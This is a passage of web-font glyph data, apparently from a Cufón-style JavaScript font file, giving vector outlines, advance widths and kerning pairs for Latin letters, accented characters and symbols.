139,168,-139r156,0v8,-113,-23,-175,-136,-172v-72,2,-102,18,-133,61xm233,-39v96,0,148,-27,147,-129r0,-62r-150,0v-82,0,-123,32,-123,97v0,71,48,94,126,94xm296,-590r-58,0r-106,-147r67,0","w":524},{"d":"629,0r-54,0r-411,-619r0,619r-54,0r0,-712r54,0r411,617r0,-617r54,0r0,712","w":739},{"d":"398,0r-344,0r0,-48r290,-389r-274,0r0,-45r328,0r0,48r-291,389r291,0r0,45","w":452},{"d":"587,0r-58,0r-62,-173r-332,0r-62,173r-58,0r262,-712r48,0xm450,-221r-149,-419r-149,419r298,0xm236,-884v35,0,92,47,125,45v17,0,37,-11,59,-33r30,29v-32,32,-62,48,-89,48v-31,0,-96,-45,-125,-45v-17,0,-37,11,-59,33r-30,-29v32,-32,62,-48,89,-48","w":602,"k":{"\u0152":10,"y":15,"v":15,"Y":35,"W":10,"V":35,"T":60,"Q":10,"O":10,"G":10,"C":10}},{"d":"291,-488v138,0,180,98,180,247v0,149,-42,247,-180,247v-61,0,-109,-23,-143,-68r0,292r-51,0r0,-712r51,0r0,62v34,-45,82,-68,143,-68xm284,-39v112,0,136,-90,136,-202v0,-113,-24,-202,-136,-202v-112,0,-136,90,-136,202v0,113,24,202,136,202","w":540},{"d":"560,-546v12,59,12,321,0,380v-28,139,-225,225,-364,137r-35,73r-53,0r49,-102v-77,-76,-75,-129,-75,-298v0,-163,-5,-212,66,-289v75,-80,207,-97,308,-38r35,-73r53,0r-49,102v32,29,57,69,65,108xm506,-183v11,-51,12,-281,2,-337v-5,-32,-17,-61,-37,-84r-253,529v72,52,184,41,243,-22v23,-25,38,-53,45,-86xm434,-637v-72,-52,-185,-41,-243,22v-59,66,-55,116,-55,259v0,134,-5,182,45,248","w":652},{"d":"169,-227r-74,0r0,-74r74,0r0,74","w":264},{"d":"542,0r-432,0r0,-712r432,0r0,48r-378,0r0,281r322,0r0,48r-322,0r0,287r378,0r0,48xm361,-780r-58,0r-106,-147r67,0","w":598},{"d":"587,0r-58,0r-62,-173r-332,0r-62,173r-58,0r262,-712r48,0xm450,-221r-149,-419r-149,419r298,0xm418,-927r-106,147r-58,0r97,-147r67,0","w":602,"k":{"\u0152":10,"y":15,"v":15,"Y":35,"W":10,"V":35,"T":60,"Q":10,"O":10,"G":10,"C":10}},{"d":"164,0r-54,0r0,-712r54,0r0,712xm274,-780r-58,0r-106,-147r67,0","w":274},{"d":"587,0r-58,0r-62,-173r-332,0r-62,173r-58,0r262,-712r48,0xm450,-221r-149,-419r-149,419r298,0xm434,-790r-58,0r0,-77r58,0r0,77xm226,-790r-58,0r0,-77r58,0r0,77","w":602,"k":{"\u0152":10,"y":15,"v":15,"Y":35,"W":10,"V":35,"T":60,"Q":10,"O":10,"G":10,"C":10}},{"d":"409,-435v49,27,64,52,64,124r0,177v1,101,-76,146,-188,134r0,-45v81,6,137,-16,137,-95r0,-179v2,-79,-55,-98,-137,-91r0,-45v84,9,138,-28,137,-102v-1,-77,-52,-117,-139,-117v-92,0,-135,58,-135,149r0,525r-51,0r0,-525v-1,-119,73,-194,192,-194v105,0,183,55,183,162v0,53,-21,94,-63,122","w":550},{"d":"585,-521v0,108,-68,177,-164,192r172,329r-63,0r-170,-328r-196,0r0,328r-54,0r0,-712r271,0v118,-1,204,72,204,191xm374,-376v93,0,157,-50,157,-144v0,-95,-64,-144,-157,-144r-210,0r0,288r210,0","w":657,"k":{"J":30}},{"d":"970,-263r-404,404r-69,0r379,-379r-819,0r0,-50r819,0r-379,-379r69,0","w":1027},{"d":"321,-642r-70,70r0,-140r70,0r0,70xm165,-642r-70,70r0,-140r70,0r0,70","w":416,"k":{"\u00c6":80,"\u00c5":80,"\u00c4":80,"\u00c3":80,"\u00c2":80,"\u00c1":80,"\u00c0":80,"J":120,"A":80}},{"d":"447,-718v195,0,362,167,362,362v0,195,-167,362,-362,362v-195,0,-362,-167,-362,-362v0,-195,167,-362,362,-362xm447,-37v168,0,315,-151,315,-319v0,-168,-148,-319,-315,-319v-168,0,-315,151,-315,319v0,168,148,319,315,319xm585,-439v-1,62,-40,98,-91,112r101,171r-52,0r-99,-167r-66,0r0,167r-45,0r0,-401r128,0v65,-2,125,53,124,118xm456,-363v46,1,84,-32,84,-76v0,-44,-38,-77,-84,-77r-78,0r0,153r78,0","w":894},{"d":"716,-67r-52,0r0,67r-44,0r0,-67r-170,0r0,-40r154,-320r47,0r-153,320r122,0r0,-120r44,0r0,120r52,0r0,40xm545,-712r-332,712r-45,0r332,-712r45,0xm169,-285r-44,0r0,-378r-80,71r0,-51r80,-69r44,0r0,427","w":756},{"w":195},{"w":195},{"d":"338,-786r-285,860r-53,0r285,-860r53,0","w":338},{"d":"367,-737r-106,147r-58,0r97,-147r67,0","w":500},{"d":"560,-546v13,59,12,321,0,380v-20,95,-126,172,-234,172v-108,0,-214,-77,-234,-172v-13,-59,-12,-321,0,-380v20,-95,126,-172,234,-172v108,0,214,77,234,172xm506,-183v11,-54,11,-292,0,-346v-16,-80,-92,-141,-180,-141v-88,0,-164,61,-180,141v-11,54,-11,292,0,346v16,80,92,141,180,141v88,0,164,-61,180,-141xm476,-780r-57,0r-93,-109r-93,109r-57,0r123,-147r54,0","w":652,"k":{"\u00c6":10,"Y":10,"X":10,"W":10,"V":10,"T":20,"J":40,"A":10}},{"d":"560,-546v13,59,12,321,0,380v-20,95,-126,172,-234,172v-108,0,-214,-77,-234,-172v-13,-59,-12,-321,0,-380v20,-95,126,-172,234,-172v108,0,214,77,234,172xm506,-183v11,-54,11,-292,0,-346v-16,-80,-92,-141,-180,-141v-88,0,-164,61,-180,141v-11,54,-11,292,0,346v16,80,92,141,180,141v88,0,164,-61,180,-141xm443,-927r-106,147r-58,0r97,-147r67,0","w":652,"k":{"\u00c6":10,"Y":10,"X":10,"W":10,"V":10,"T":20,"J":40,"A":10}},{"d":"599,-488v135,1,201,109,193,258r-335,0v-1,115,49,190,157,190v66,0,95,-22,133,-58r38,30v-49,47,-87,74,-174,74v-86,0,-145,-35,-178,-105v-27,61,-88,105,-170,105v-132,0,-194,-96,-194,-247v0,-152,61,-247,194,-247v82,0,143,44,170,105v33,-70,88,-105,166,-105xm741,-271v9,-130,-109,-214,-217,-150v-47,28,-64,77,-67,150r284,0xm263,-39v103,0,143,-72,143,-202v0,-131,-39,-202,-143,-202v-103,0,-143,72,-143,202v0,131,39,202,143,202","w":860},{"d":"484,-712r-210,417r0,295r-54,0r0,-295r-210,-417r58,0r181,360r177,-360r58,0xm364,-927r-106,147r-58,0r97,-147r67,0","w":494},{"d":"74,-414v39,-53,83,-73,170,-74v125,0,187,53,187,158r0,330r-51,0r0,-48v-40,39,-72,53,-147,54v-110,1,-177,-41,-177,-138v0,-93,70,-139,168,-139r156,0v8,-113,-23,-175,-136,-172v-72,2,-102,18,-133,61xm233,-39v96,0,148,-27,147,-129r0,-62r-150,0v-82,0,-123,32,-123,97v0,71,48,94,126,94xm184,-694v35,0,92,47,125,45v17,0,37,-11,59,-33r30,29v-32,32,-62,48,-89,48v-31,0,-96,-45,-125,-45v-17,0,-37,11,-59,33r-30,-29v32,-32,62,-48,89,-48","w":524},{"d":"514,0r-63,0r-186,-317r-186,317r-61,0r218,-365r-204,-347r63,0r170,299r171,-299r62,0r-204,347","w":532,"k":{"\u0152":10,"\u00d6":10,"\u00d5":10,"\u00d4":10,"\u00d3":10,"\u00d2":10,"\u00c7":10,"y":15,"Q":10,"O":10,"J":-15,"G":10,"C":10}},{"d":"344,-42v114,0,190,-81,190,-196r0,-474r54,0r0,481v2,137,-105,237,-244,237v-139,0,-244,-100,-244,-237r0,-481r54,0r0,474v-2,115,76,196,190,196xm494,-780r-57,0r-93,-109r-93,109r-57,0r123,-147r54,0","w":687},{"d":"560,-546v13,59,12,321,0,380v-20,95,-126,172,-234,172v-108,0,-214,-77,-234,-172v-13,-59,-12,-321,0,-380v20,-95,126,-172,234,-172v108,0,214,77,234,172xm506,-183v11,-54,11,-292,0,-346v-16,-80,-92,-141,-180,-141v-88,0,-164,61,-180,141v-11,54,-11,292,0,346v16,80,92,141,180,141v88,0,164,-61,180,-141xm261,-884v35,0,92,47,125,45v17,0,37,-11,59,-33r30,29v-32,32,-62,48,-89,48v-31,0,-96,-45,-125,-45v-17,0,-37,11,-59,33r-30,-29v32,-32,62,-48,89,-48","w":652,"k":{"\u00c6":10,"Y":10,"X":10,"W":10,"V":10,"T":20,"J":40,"A":10}},{"d":"148,0r-51,0r0,-482r51,0r0,482xm397,-590r-57,0r-93,-109r-93,109r-57,0r123,-147r54,0","w":245},{"d":"461,-240r-408,0r0,-47r408,0r0,47"},{"d":"542,0r-432,0r0,-712r432,0r0,48r-378,0r0,281r322,0r0,48r-322,0r0,287r378,0r0,48xm431,-927r-106,147r-58,0r97,-147r67,0","w":598},{"d":"347,-263v45,-3,50,-15,83,-45r31,31v-44,41,-54,58,-116,62v-23,7,-147,-56,-178,-54v-45,3,-50,15,-83,45r-31,-31v44,-41,54,-58,116,-62v23,-7,147,56,178,54"},{"d":"570,-338r-1,291r372,0r0,47r-425,0r0,-85v-84,115,-270,122,-368,18v-72,-76,-66,-126,-66,-289v0,-163,-6,-212,66,-289v98,-104,284,-97,368,18r0,-85r422,0r0,47r-369,0r1,285r313,0r0,42r-313,0xm506,-183v11,-54,11,-292,0,-346v-16,-80,-92,-141,-180,-141v-88,0,-164,61,-180,141v-11,54,-11,292,0,346v16,80,92,141,180,141v88,0,164,-61,180,-141","w":997},{"d":"420,0r-62,0r-127,-203r-129,203r-62,0r163,-246r-156,-236r62,0r122,194r120,-194r62,0r-156,236","w":460,"k":{"\u0153":20,"\u00f8":20,"\u00f6":20,"\u00f5":20,"\u00f4":20,"\u00f3":20,"\u00f2":20,"\u00eb":20,"\u00ea":20,"\u00e9":20,"\u00e8":20,"\u00e7":20,"\u00e6":20,"o":20,"e":20,"c":20}},{"d":"484,-712r-210,417r0,295r-54,0r0,-295r-210,-417r58,0r181,360r177,-360r58,0","w":494,"k":{"\u0153":80,"\u0152":10,"\u00f8":80,"\u00e7":80,"\u00e6":80,"\u00d8":10,"\u00d6":10,"\u00d5":10,"\u00d4":10,"\u00d3":10,"\u00d2":10,"\u00c7":10,"\u00c6":40,"\u00c5":40,"\u00c4":40,"\u00c3":40,"\u00c2":40,"\u00c1":40,"\u00c0":40,"z":40,"x":40,"u":40,"s":80,"r":40,"q":80,"p":40,"o":80,"n":40,"m":40,"g":80,"e":80,"d":80,"c":80,"a":80,"Q":10,"O":10,"J":40,"G":10,"C":10,"A":40,".":80}},{"d":"164,0r-54,0r0,-712r54,0r0,712xm410,-780r-57,0r-93,-109r-93,109r-57,0r123,-147r54,0","w":274},{"d":"74,-414v39,-53,83,-73,170,-74v125,0,187,53,187,158r0,330r-51,0r0,-48v-40,39,-72,53,-147,54v-110,1,-177,-41,-177,-138v0,-93,70,-139,168,-139r156,0v8,-113,-23,-175,-136,-172v-72,2,-102,18,-133,61xm233,-39v96,0,148,-27,147,-129r0,-62r-150,0v-82,0,-123,32,-123,97v0,71,48,94,126,94","w":524},{"d":"165,0r-70,70r0,-140r70,0r0,70","w":260},{"d":"321,-642r-70,0r0,-70r70,-70r0,140xm165,-642r-70,0r0,-70r70,-70r0,140","w":416,"k":{"\u00c6":80,"\u00c5":80,"\u00c4":80,"\u00c3":80,"\u00c2":80,"\u00c1":80,"\u00c0":80,"J":120,"A":80}},{"d":"485,-265r-196,196r0,-66r130,-130r-130,-130r0,-66xm278,-265r-196,196r0,-66r130,-130r-130,-130r0,-66","w":527},{"d":"344,-240r-262,0r0,-47r262,0r0,47","w":426},{"d":"970,-238r-819,0r379,379r-69,0r-404,-404r404,-404r69,0r-379,379r819,0r0,50","w":1027},{"d":"461,-240r-180,0r0,181r-47,0r0,-181r-181,0r0,-47r181,0r0,-180r47,0r0,180r180,0r0,47"},{"d":"275,-39v86,0,137,-56,136,-144r0,-299r51,0r0,482r-51,0r0,-57v-36,42,-83,63,-142,63v-109,1,-178,-70,-178,-180r0,-308r51,0r0,299v-1,90,45,144,133,144xm393,-737r-106,147r-58,0r97,-147r67,0","w":559},{"d":"102,-806v59,63,85,75,85,173r0,554v-4,97,-26,110,-85,173r-37,-37v51,-54,68,-60,68,-142r0,-542v-3,-82,-17,-88,-68,-142","w":284},{"w":975},{"d":"169,0r-74,0r0,-74r74,0r0,74","w":264},{"d":"542,0r-432,0r0,-712r432,0r0,48r-378,0r0,281r322,0r0,48r-322,0r0,287r378,0r0,48xm464,-780r-57,0r-93,-109r-93,109r-57,0r123,-147r54,0","w":598},{"d":"164,0r-54,0r0,-712r54,0r0,712xm376,-790r-58,0r0,-77r58,0r0,77xm168,-790r-58,0r0,-77r58,0r0,77","w":274},{"d":"72,-655v31,-43,66,-59,136,-60v99,0,148,42,148,126r0,262r-43,0r0,-36v-28,27,-66,41,-114,41v-87,0,-139,-32,-140,-110v-1,-73,56,-111,133,-111r121,0v6,-87,-17,-136,-105,-133v-57,2,-80,13,-104,48xm199,-361v77,0,115,-18,114,-100r0,-47r-116,0v-63,0,-95,25,-95,75v0,55,36,72,97,72","w":447},{"d":"263,-488v132,0,194,96,194,247v0,152,-61,247,-194,247v-132,0,-194,-96,-194,-247v0,-152,61,-247,194,-247xm263,-39v103,0,143,-72,143,-202v0,-131,-39,-202,-143,-202v-103,0,-143,72,-143,202v0,131,39,202,143,202xm380,-737r-106,147r-58,0r97,-147r67,0","w":526,"k":{"y":10,"x":20,"w":5,"v":10}},{"w":162},{"d":"45,-522v0,-110,91,-190,211,-190r213,0r0,942r-51,0r0,-894r-123,0r0,894r-51,0r0,-562v-113,4,-199,-85,-199,-190","w":579},{"d":"524,-712r-234,712r-46,0r-234,-712r57,0r200,617r200,-617r57,0","w":534,"k":{"\u0153":40,"\u0152":10,"\u00f8":40,"\u00e7":40,"\u00e6":40,"\u00d8":10,"\u00d6":10,"\u00d5":10,"\u00d4":10,"\u00d3":10,"\u00d2":10,"\u00c7":10,"\u00c6":35,"\u00c5":35,"\u00c4":35,"\u00c3":35,"\u00c2":35,"\u00c1":35,"\u00c0":35,"z":20,"y":10,"x":20,"u":20,"s":40,"r":20,"q":40,"p":20,"o":40,"n":20,"m":20,"g":40,"e":40,"d":40,"c":40,"a":40,"Q":10,"O":10,"G":10,"C":10,"A":35,".":80}},{"d":"629,0r-74,0r0,-74r74,0r0,74xm399,0r-74,0r0,-74r74,0r0,74xm169,0r-74,0r0,-74r74,0r0,74","w":724},{"d":"461,-270r-180,0r0,182r-47,0r0,-182r-181,0r0,-47r181,0r0,-181r47,0r0,181r180,0r0,47xm461,0r-408,0r0,-47r408,0r0,47"},{"d":"165,-642r-70,0r0,-70r70,-70r0,140","w":260,"k":{"\u00c6":80,"\u00c5":80,"\u00c4":80,"\u00c3":80,"\u00c2":80,"\u00c1":80,"\u00c0":80,"s":60,"J":120,"A":80}},{"d":"542,0r-432,0r0,-712r54,0r0,664r378,0r0,48","w":572,"k":{"\u201d":150,"\u201c":150,"\u2019":150,"\u2018":150,"\u0152":40,"\u00d6":40,"\u00d5":40,"\u00d4":40,"\u00d3":40,"\u00d2":40,"\u00c7":40,"y":60,"Y":80,"W":40,"V":70,"U":40,"T":80,"Q":40,"O":40,"J":-15,"G":40,"C":40}},{"d":"344,-240r-262,0r0,-47r262,0r0,47","w":426},{"d":"400,-590r-57,0r-93,-109r-93,109r-57,0r123,-147r54,0","w":500},{"d":"197,-312r-74,0r0,-74r74,0r0,74xm197,0r-74,0r0,-74r74,0r0,74","w":292},{"d":"371,-564v124,-1,215,80,215,205v0,125,-91,205,-215,205r-207,0r0,154r-54,0r0,-712r54,0r0,148r207,0xm365,-202v101,0,167,-54,167,-157v0,-103,-66,-157,-167,-157r-201,0r0,314r201,0","w":646},{"d":"263,-488v132,0,194,96,194,247v0,152,-61,247,-194,247v-132,0,-194,-96,-194,-247v0,-152,61,-247,194,-247xm263,-39v103,0,143,-72,143,-202v0,-131,-39,-202,-143,-202v-103,0,-143,72,-143,202v0,131,39,202,143,202xm198,-694v35,0,92,47,125,45v17,0,37,-11,59,-33r30,29v-32,32,-62,48,-89,48v-31,0,-96,-45,-125,-45v-17,0,-37,11,-59,33r-30,-29v32,-32,62,-48,89,-48","w":526,"k":{"y":10,"x":20,"w":5,"v":10}},{"w":255},{"d":"262,-488v135,0,201,109,193,258r-335,0v-1,115,49,190,157,190v66,0,95,-22,133,-58r38,30v-49,47,-87,74,-174,74v-142,0,-205,-96,-205,-247v0,-142,62,-247,193,-247xm404,-271v9,-130,-109,-214,-217,-150v-47,28,-64,77,-67,150r284,0xm381,-737r-106,147r-58,0r97,-147r67,0","w":523,"k":{"y":10,"x":20,"w":5,"v":10}},{"d":"321,0r-70,70r0,-140r70,0r0,70xm165,0r-70,70r0,-140r70,0r0,70","w":416,"k":{"Y":110,"W":50,"V":80,"T":110}},{"w":243},{"d":"275,-39v86,0,137,-56,136,-144r0,-299r51,0r0,482r-51,0r0,-57v-36,42,-83,63,-142,63v-109,1,-178,-70,-178,-180r0,-308r51,0r0,299v-1,90,45,144,133,144xm426,-590r-57,0r-93,-109r-93,109r-57,0r123,-147r54,0","w":559},{"d":"344,-42v114,0,190,-81,190,-196r0,-474r54,0r0,481v2,137,-105,237,-244,237v-139,0,-244,-100,-244,-237r0,-481r54,0r0,474v-2,115,76,196,190,196xm391,-780r-58,0r-106,-147r67,0","w":687},{"w":487},{"d":"148,-85v4,80,17,91,69,144r-35,35v-59,-62,-85,-77,-85,-173r0,-554v4,-95,26,-111,85,-173r35,35v-52,54,-69,63,-69,144r0,542","w":284},{"d":"275,-39v86,0,137,-56,136,-144r0,-299r51,0r0,482r-51,0r0,-57v-36,42,-83,63,-142,63v-109,1,-178,-70,-178,-180r0,-308r51,0r0,299v-1,90,45,144,133,144xm323,-590r-58,0r-106,-147r67,0","w":559},{"d":"467,-366v72,22,121,83,122,172v1,125,-83,195,-209,194r-270,0r0,-712r262,0v117,-1,206,70,206,186v0,79,-48,141,-111,160xm366,-388v92,0,158,-44,158,-138v0,-94,-66,-138,-158,-138r-202,0r0,276r202,0xm374,-48v94,1,161,-54,161,-146v0,-92,-67,-146,-161,-146r-210,0r0,292r210,0","w":671,"k":{"J":30}},{"d":"275,-39v86,0,137,-56,136,-144r0,-299r51,0r0,482r-51,0r0,-57v-36,42,-83,63,-142,63v-109,1,-178,-70,-178,-180r0,-308r51,0r0,299v-1,90,45,144,133,144xm409,-600r-58,0r0,-77r58,0r0,77xm201,-600r-58,0r0,-77r58,0r0,77","w":559},{"d":"542,0r-432,0r0,-712r432,0r0,48r-378,0r0,281r322,0r0,48r-322,0r0,287r378,0r0,48xm447,-790r-58,0r0,-77r58,0r0,77xm239,-790r-58,0r0,-77r58,0r0,77","w":598},{"d":"148,0r-51,0r0,-482r51,0r0,482xm261,-737r-106,147r-58,0r97,-147r67,0","w":245},{"d":"308,70r-64,150r-63,0r72,-150r55,0","w":500},{"d":"245,74r-148,0r0,-860r148,0r0,45r-97,0r0,770r97,0r0,45","w":290},{"d":"69,-241v0,-152,61,-247,194,-247v40,0,75,10,105,30r40,-68r48,0r-56,94v38,41,57,104,57,191v0,152,-61,247,-194,247v-39,0,-74,-10,-105,-29r-40,67r-48,0r56,-94v-38,-41,-57,-104,-57,-191xm263,-39v103,0,143,-72,143,-202v0,-69,-11,-119,-32,-148r-192,325v24,17,51,25,81,25xm263,-443v-103,0,-143,72,-143,202v0,69,11,119,32,148r192,-325v-24,-17,-51,-25,-81,-25","w":526},{"d":"313,0r-51,0r0,-654r-129,114r0,-61r129,-111r51,0r0,712"},{"d":"290,-488v109,-1,178,70,178,180r0,308r-51,0r0,-299v1,-90,-45,-144,-133,-144v-86,0,-137,56,-136,144r0,299r-51,0r0,-482r51,0r0,57v36,-42,83,-63,142,-63xm219,-694v35,0,92,47,125,45v17,0,37,-11,59,-33r30,29v-32,32,-62,48,-89,48v-31,0,-96,-45,-125,-45v-17,0,-37,11,-59,33r-30,-29v32,-32,62,-48,89,-48","w":559},{"d":"283,-671v-75,0,-123,38,-122,113v0,55,30,90,91,107v72,20,143,33,181,89v23,34,36,72,36,115v1,84,-51,143,-110,170v58,19,103,72,103,146v0,98,-78,167,-179,167v-100,0,-179,-60,-184,-155r54,0v7,71,50,107,130,107v106,0,160,-113,99,-189v-32,-41,-95,-49,-151,-65v-77,-22,-133,-88,-134,-181v-1,-84,51,-143,110,-170v-66,-29,-99,-76,-99,-141v0,-147,194,-207,298,-120v34,27,52,64,55,111r-53,0v-7,-69,-48,-104,-125,-104xm283,-105v78,0,132,-60,132,-142v0,-86,-58,-141,-132,-142v-78,-1,-132,60,-132,142v0,83,54,142,132,142","w":566},{"d":"148,-418v41,-75,193,-98,257,-24r-37,37v-27,-26,-43,-37,-91,-38v-80,-2,-130,67,-129,146r0,297r-51,0r0,-482r51,0r0,64","w":409,"k":{"\u0153":35,"\u00f8":35,"\u00f6":35,"\u00f5":35,"\u00f4":35,"\u00f3":35,"\u00f2":35,"\u00eb":35,"\u00ea":35,"\u00e9":35,"\u00e8":35,"\u00e7":35,"\u00e6":35,"s":10,"q":35,"o":35,"g":35,"e":35,"d":35,"c":35,"a":10,".":120}},{"d":"344,-240r-262,0r0,-47r262,0r0,47","w":426},{"w":975},{"d":"281,-39v65,0,87,-22,124,-61r35,32v-46,49,-77,73,-159,74v-136,1,-212,-103,-212,-247v0,-176,132,-292,297,-231v24,9,49,30,74,58r-35,32v-37,-39,-59,-61,-124,-61v-107,0,-161,79,-161,202v0,123,53,202,161,202","w":493,"k":{"\u0153":15,"\u00f6":15,"\u00f5":15,"\u00f4":15,"\u00f3":15,"\u00f2":15,"\u00eb":15,"\u00ea":15,"\u00e9":15,"\u00e8":15,"\u00e6":15,"\u00e5":15,"\u00e4":15,"\u00e3":15,"\u00e2":15,"\u00e1":15,"\u00e0":15,"w":20,"o":15,"e":15,"d":10,"c":15,"a":15}},{"d":"238,-69r-196,-196r196,-196r0,66r-130,130r130,130r0,66","w":320},{"d":"74,-414v39,-53,83,-73,170,-74v125,0,187,53,187,158r0,330r-51,0r0,-48v-40,39,-72,53,-147,54v-110,1,-177,-41,-177,-138v0,-93,70,-139,168,-139r156,0v8,-113,-23,-175,-136,-172v-72,2,-102,18,-133,61xm233,-39v96,0,148,-27,147,-129r0,-62r-150,0v-82,0,-123,32,-123,97v0,71,48,94,126,94xm399,-590r-57,0r-93,-109r-93,109r-57,0r123,-147r54,0","w":524},{"d":"822,-712r-178,712r-55,0r-168,-620r-168,620r-55,0r-178,-712r57,0r150,619r166,-619r56,0r166,619r150,-619r57,0","w":842,"k":{"\u0153":40,"\u0152":10,"\u00f8":40,"\u00e7":40,"\u00e6":40,"\u00d8":10,"\u00d6":10,"\u00d5":10,"\u00d4":10,"\u00d3":10,"\u00d2":10,"\u00c7":10,"\u00c6":10,"\u00c5":10,"\u00c4":10,"\u00c3":10,"\u00c2":10,"\u00c1":10,"\u00c0":10,"s":40,"q":40,"o":40,"g":40,"e":40,"d":40,"c":40,"a":40,"Q":10,"O":10,"G":10,"C":10,"A":10,".":50}},{"d":"273,-497v87,0,163,75,163,163v0,88,-76,163,-163,163v-87,0,-163,-75,-163,-163v0,-88,76,-163,163,-163","w":546},{"d":"484,-712r-210,417r0,295r-54,0r0,-295r-210,-417r58,0r181,360r177,-360r58,0xm380,-790r-58,0r0,-77r58,0r0,77xm172,-790r-58,0r0,-77r58,0r0,77","w":494},{"w":162},{"d":"171,-415r-67,0r0,-67r67,0r0,67xm165,230r-55,0r3,-520r49,0","w":304},{"d":"263,-488v132,0,194,96,194,247v0,152,-61,247,-194,247v-132,0,-194,-96,-194,-247v0,-152,61,-247,194,-247xm263,-39v103,0,143,-72,143,-202v0,-131,-39,-202,-143,-202v-103,0,-143,72,-143,202v0,131,39,202,143,202xm396,-600r-58,0r0,-77r58,0r0,77xm188,-600r-58,0r0,-77r58,0r0,77","w":526,"k":{"y":10,"x":20,"w":5,"v":10}},{"d":"229,-719v84,0,157,73,157,157v0,84,-73,157,-157,157v-84,0,-157,-73,-157,-157v0,-84,73,-157,157,-157xm229,-447v63,0,112,-52,112,-115v0,-63,-50,-115,-113,-115v-64,0,-111,51,-111,115v0,63,49,115,112,115","w":458},{"d":"588,-437r-100,0r-25,153r96,0r0,44r-103,0r-38,240r-51,0r39,-240r-176,0r-37,240r-51,0r38,-240r-96,0r0,-44r103,0r25,-153r-99,0r0,-45r105,0r36,-230r52,0r-37,230r175,0r36,-230r50,0r-36,230r94,0r0,45xm437,-437r-175,0r-25,153r175,0","w":639},{"d":"197,-312r-74,0r0,-74r74,0r0,74xm193,68r-68,68r0,-204r68,0r0,136","w":292},{"d":"542,0r-432,0r0,-712r432,0r0,48r-378,0r0,281r322,0r0,48r-322,0r0,287r378,0r0,48","w":598,"k":{"J":10}},{"d":"281,-39v65,0,87,-22,124,-61r35,32v-46,49,-77,73,-159,74v-136,1,-212,-103,-212,-247v0,-176,132,-292,297,-231v24,9,49,30,74,58r-35,32v-37,-39,-59,-61,-124,-61v-107,0,-161,79,-161,202v0,123,53,202,161,202xm308,70r-64,150r-63,0r72,-150r55,0","w":498,"k":{"\u0153":15,"\u00e6":15,"o":15,"e":15,"c":15,"a":15}},{"d":"186,-42v105,0,159,-70,158,-179r0,-491r54,0r0,502v2,128,-85,218,-212,216v-63,0,-115,-20,-156,-61r37,-37v33,32,57,50,119,50","w":498,"k":{"A":10}},{"d":"297,-590r-58,0r-106,-147r67,0","w":500},{"d":"627,0r-64,0r-229,-399r-170,206r0,193r-54,0r0,-712r54,0r0,445r361,-445r65,0r-220,272","w":645,"k":{"\u0152":10,"\u00d6":10,"\u00d5":10,"\u00d4":10,"\u00d3":10,"\u00d2":10,"\u00c7":10,"y":30,"Q":10,"O":10,"J":-15,"G":10,"C":10}},{"d":"560,-546v13,59,12,321,0,380v-20,95,-126,172,-234,172v-108,0,-214,-77,-234,-172v-13,-59,-12,-321,0,-380v20,-95,126,-172,234,-172v108,0,214,77,234,172xm506,-183v11,-54,11,-292,0,-346v-16,-80,-92,-141,-180,-141v-88,0,-164,61,-180,141v-11,54,-11,292,0,346v16,80,92,141,180,141v88,0,164,-61,180,-141xm373,-780r-58,0r-106,-147r67,0","w":652,"k":{"Y":10,"X":10,"W":10,"V":10,"T":20,"J":40,"A":10}},{"d":"708,0r-54,0r0,-587r-216,487r-54,0r-220,-487r0,587r-54,0r0,-712r54,0r248,549r242,-549r54,0r0,712","w":818},{"d":"193,74r-148,0r0,-42r100,0r0,-776r-100,0r0,-42r148,0r0,860","w":290},{"d":"148,0r-51,0r0,-482r51,0r0,482xm363,-600r-58,0r0,-77r58,0r0,77xm155,-600r-58,0r0,-77r58,0r0,77","w":245},{"d":"459,-667r-252,667r-52,0r252,-667r-270,0r0,112r-51,0r0,-157r373,0r0,45"},{"d":"326,-42v103,-1,171,-70,189,-160r53,0v-19,119,-110,206,-242,208v-108,2,-214,-77,-234,-172v-13,-59,-12,-321,0,-380v20,-95,126,-174,234,-172v133,2,223,88,242,208r-55,0v-18,-91,-84,-159,-187,-160v-88,-1,-164,61,-180,141v-11,54,-11,292,0,346v16,80,92,142,180,141","w":644,"k":{"\u00c6":10,"\u00c5":10,"\u00c4":10,"\u00c3":10,"\u00c2":10,"\u00c1":10,"\u00c0":10,"Y":10,"X":10,"W":10,"V":10,"T":20,"J":40,"A":10}},{"d":"297,-590r-58,0r-106,-147r67,0xm327,-488v132,0,194,96,194,247v0,152,-61,247,-194,247v-132,0,-194,-96,-194,-247v0,-152,61,-247,194,-247xm327,-39v103,0,143,-72,143,-202v0,-131,-39,-202,-143,-202v-103,0,-143,72,-143,202v0,131,39,202,143,202","w":526,"k":{"y":10,"x":20,"w":5,"v":10}},{"d":"560,-546v13,59,12,321,0,380v-20,95,-126,172,-234,172v-108,0,-214,-77,-234,-172v-13,-59,-12,-321,0,-380v20,-95,126,-172,234,-172v108,0,214,77,234,172xm506,-183v11,-54,11,-292,0,-346v-16,-80,-92,-141,-180,-141v-88,0,-164,61,-180,141v-11,54,-11,292,0,346v16,80,92,141,180,141v88,0,164,-61,180,-141","w":652,"k":{"\u00c6":10,"\u00c5":10,"\u00c4":10,"\u00c3":10,"\u00c2":10,"\u00c1":10,"\u00c0":10,"Y":10,"X":10,"W":10,"V":10,"T":20,"J":40,"A":10}},{"d":"443,-109r-31,31r-155,-155r-155,155r-31,-31r155,-155r-155,-155r31,-31r155,155r155,-155r31,31r-155,155"},{"d":"496,0r-433,0r0,-57r375,-607r-360,0r0,-48r418,0r0,48r-378,616r378,0r0,48","w":559},{"d":"527,-164v34,-54,41,-88,42,-177r53,0v0,94,-21,166,-62,217r102,124r-69,0r-69,-84v-62,60,-135,90,-219,90v-151,0,-265,-125,-209,-276v27,-74,85,-104,151,-148v-38,-46,-75,-84,-79,-158v-4,-78,66,-142,145,-142v79,0,145,65,145,143v0,69,-78,129,-135,164xm313,-670v-72,0,-115,81,-77,146v10,18,29,44,56,77v45,-35,110,-57,113,-128v1,-52,-41,-95,-92,-95xm138,-200v-6,93,71,158,166,158v67,0,131,-26,190,-79r-216,-261v-85,61,-134,82,-140,182","w":746},{"d":"326,-42v111,0,195,-86,191,-210r0,-64r-191,0r0,-48r245,0r0,116v17,234,-278,333,-423,181v-72,-76,-66,-126,-66,-289v0,-163,-5,-212,66,-289v84,-91,245,-98,338,-16v44,38,72,88,83,151r-54,0v-18,-91,-86,-159,-189,-160v-88,-1,-164,61,-180,141v-11,54,-11,292,0,346v16,80,92,141,180,141","w":651,"k":{"\u00c6":10,"\u00c5":10,"\u00c4":10,"\u00c3":10,"\u00c2":10,"\u00c1":10,"\u00c0":10,"Y":10,"X":10,"W":10,"V":10,"T":20,"